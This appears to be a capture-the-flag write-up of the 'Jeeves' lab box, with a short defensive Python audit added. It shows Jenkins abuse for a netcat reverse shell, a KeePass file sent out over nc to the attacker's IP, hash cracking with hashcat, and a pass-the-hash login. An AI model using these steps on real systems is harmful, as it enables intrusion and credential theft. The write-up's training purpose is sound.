As always we start with an Nmap scan; the most obviously odd thing is port 50000, which turns out to be Jenkins.

Nmap scan report for 10.10.10.63
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_  Message signing enabled but not required
| smb2-time:
|   date: 2019-10-20 01:23:12
|_  start_date: 2019-10-20 01:21:48

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.72 seconds

If we run dirbuster against port 50000 we find the askjeeves folder.

If you open it, it is a Jenkins administrator console, and from there you can run Windows commands by creating a project. We are going to download nc and call back to our machine.

root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\kohsuke\Desktop>more user.txt
more user.txt
e3232272596fb47950d

To become admin you need to find the file CEH.kdbx (a KeePass database).

We transfer it from Windows to Linux with:

C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx
nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx

We receive it with:

root@Kali2:~/Downloads# nc -lp 1235 >jeeves.kdbx

We extract the hash with John (keepass2john):

root@Kali2:~/Downloads# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

We copy everything except "CEH:" into a new file and crack it with hashcat and rockyou:

root@Kali2:~/Desktop# hashcat -m 13400 hashcatjeeves /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Running
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Sat Oct 19 21:15:25 2019 (38 secs)
Time.Estimated...: Sun Oct 20 03:02:58 2019 (5 hours, 46 mins)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      688 H/s (15.90ms) @ Accel:256 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 25600/14344385 (0.18%)
Rejected.........: 0/25600 (0.00%)
Restore.Point....: 25600/14344385 (0.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5504-5568
Candidates.#1....: joey1 -> 220292

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
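The reason rockyou is exhausted in under six hours is visible in the hash line itself: the third field is the AES-KDF transform-round count, and 6000 rounds is cheap. The following is an added example (not part of the original write-up or of John/hashcat) that parses the keepass2john line from above, produces the "everything except CEH:" string for hashcat, and audits the round count from a defender's perspective; the 1,000,000-round threshold and the linear rescaling of the 688 H/s figure are assumptions of this check.

```python
import re
from dataclasses import dataclass

# Constructed from the write-up: keepass2john's line for CEH.kdbx, KDBX 2.x layout:
#   <name>:$keepass$*2*<rounds>*<algo>*<masterseed>*<transformseed>*<iv>*<expectedstart>*<contenthash>
LINE = ("CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
        "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*"
        "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
        "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48")
MIN_ROUNDS = 1_000_000   # audit threshold: an assumption for this check, not a KeePass constant

@dataclass
class KdbxHash:
    rounds: int          # AES-KDF transform rounds: the one tunable cost factor in this format
    algorithm: int       # 0 = AES as emitted by keepass2john
    master_seed: bytes
    transform_seed: bytes
    enc_iv: bytes
    expected_start: bytes
    content_hash: bytes  # first 32 ciphertext bytes; decrypting them must yield expected_start

def parse_keepass_hash(line: str) -> KdbxHash:
    """Split a KDBX 2 keepass2john line into typed fields, validating hex and lengths."""
    f = line.strip().partition(":")[2].split("*")
    if len(f) != 9 or f[0] != "$keepass$" or f[1] != "2":
        raise ValueError("only the KDBX 2 layout is handled")
    if any(not re.fullmatch(r"[0-9a-f]+", h) for h in f[4:]):
        raise ValueError("non-hex field")
    blobs = [bytes.fromhex(h) for h in f[4:]]
    if [len(b) for b in blobs] != [32, 32, 16, 32, 32]:
        raise ValueError("unexpected seed/IV/hash length")
    return KdbxHash(int(f[2]), int(f[3]), *blobs)

def hashcat_line(line: str) -> str:
    """The 'everything after CEH:' string the write-up feeds to hashcat -m 13400."""
    parse_keepass_hash(line)                      # reject malformed input first
    return line.strip().partition(":")[2]

def hours_to_exhaust(candidates: int, rate_hps: float, rounds: int, measured_rounds: int) -> float:
    # AES-KDF cost is linear in rounds, so a rate measured at one round count rescales to another
    return candidates / (rate_hps * measured_rounds / rounds) / 3600

def audit(h: KdbxHash, min_rounds: int = MIN_ROUNDS) -> list[str]:
    """Defender check: flag a database whose KDF setting makes offline guessing cheap."""
    findings = []
    if h.rounds < min_rounds:
        eta = hours_to_exhaust(14344385, 688, h.rounds, 6000)   # rockyou size and rate from the hashcat run above
        findings.append(f"weak AES-KDF: {h.rounds} rounds; rockyou exhausts in ~{eta:.1f} h at 688 H/s")
    return findings
```

Raising the round count is the cheap fix: at 600,000 rounds the same wordlist run would take about a hundred times longer on the same hardware.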

If we open the database with KeePass2 we can extract the NTLM hash and pass the hash:

root@Kali2:~/Desktop# pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
jeeves\administrator

And done. I hope the OSCP ones aren't this hard, ha. Anyway, another box down.